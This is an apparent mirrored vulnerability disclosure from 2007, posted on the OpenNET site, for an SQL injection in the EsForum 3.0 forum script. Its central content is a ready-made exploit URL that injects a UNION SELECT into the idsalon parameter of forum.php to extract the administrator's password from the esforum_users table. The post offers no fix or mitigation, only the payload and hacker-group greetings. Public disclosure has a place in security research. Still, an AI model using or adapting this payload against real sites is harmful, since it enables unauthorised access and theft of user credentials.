The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


EsForum <= 3.0 SQL Injection Vulnerability


<< Previous INDEX Search src / Print Next >> 
Date: 22 Apr 2007 15:45:03 -0000
From: [email protected]
To: [email protected]
Subject: EsForum <= 3.0 SQL Injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...


Script: EsForum v3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
*/ MEFISTO Begins. */

-------------------------------------------------------------------------------------------------------------------
Exploit: 

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

-------------------------------------------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру